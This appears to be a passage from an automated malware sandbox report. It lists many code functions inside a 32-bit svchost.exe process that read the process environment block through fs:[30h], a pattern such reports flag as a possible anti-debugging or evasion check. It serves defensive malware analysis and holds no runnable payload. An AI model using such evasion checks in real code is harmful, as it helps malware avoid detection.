                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]1_2_03B5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]1_2_03B32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]1_2_03BB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]1_2_03B307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE47A0 mov eax, dword ptr fs:[00000030h]1_2_03BE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD678E mov eax, dword ptr fs:[00000030h]1_2_03BD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03BBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]1_2_03BB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov ecx, dword ptr fs:[00000030h]1_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]1_2_03BAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]1_2_03B30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]1_2_03B60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]1_2_03B6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]1_2_03B38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]1_2_03B30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE75D mov eax, dword ptr fs:[00000030h]1_2_03BBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]1_2_03BB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h]1_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]1_2_03B666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03B6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]1_2_03B4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]1_2_03B66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]1_2_03B68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]1_2_03B3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]1_2_03B72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]1_2_03BAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B62674 mov eax, dword ptr fs:[00000030h]1_2_03B62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4C640 mov eax, dword ptr fs:[00000030h]1_2_03B4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E59C mov eax, dword ptr fs:[00000030h]1_2_03B6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov eax, dword ptr fs:[00000030h]1_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov ecx, dword ptr fs:[00000030h]1_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64588 mov eax, dword ptr fs:[00000030h]1_2_03B64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B325E0 mov eax, dword ptr fs:[00000030h]1_2_03B325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B365D0 mov eax, dword ptr fs:[00000030h]1_2_03B365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6500 mov eax, dword ptr fs:[00000030h]1_2_03BC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B644B0 mov ecx, dword ptr fs:[00000030h]1_2_03B644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03BBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B364AB mov eax, dword ptr fs:[00000030h]1_2_03B364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA49A mov eax, dword ptr fs:[00000030h]1_2_03BEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B304E5 mov ecx, dword ptr fs:[00000030h]1_2_03B304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C427 mov eax, dword ptr fs:[00000030h]1_2_03B2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC460 mov ecx, dword ptr fs:[00000030h]1_2_03BBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA456 mov eax, dword ptr fs:[00000030h]1_2_03BEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2645D mov eax, dword ptr fs:[00000030h]1_2_03B2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5245A mov eax, dword ptr fs:[00000030h]1_2_03B5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EBFC mov eax, dword ptr fs:[00000030h]1_2_03B5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03BBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03BDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]1_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]1_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04B00 mov eax, dword ptr fs:[00000030h]1_2_03C04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2CB7E mov eax, dword ptr fs:[00000030h]1_2_03B2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28B50 mov eax, dword ptr fs:[00000030h]1_2_03B28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEB50 mov eax, dword ptr fs:[00000030h]1_2_03BDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]1_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]1_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]1_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]1_2_03BD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]1_2_03B86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]1_2_03B68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
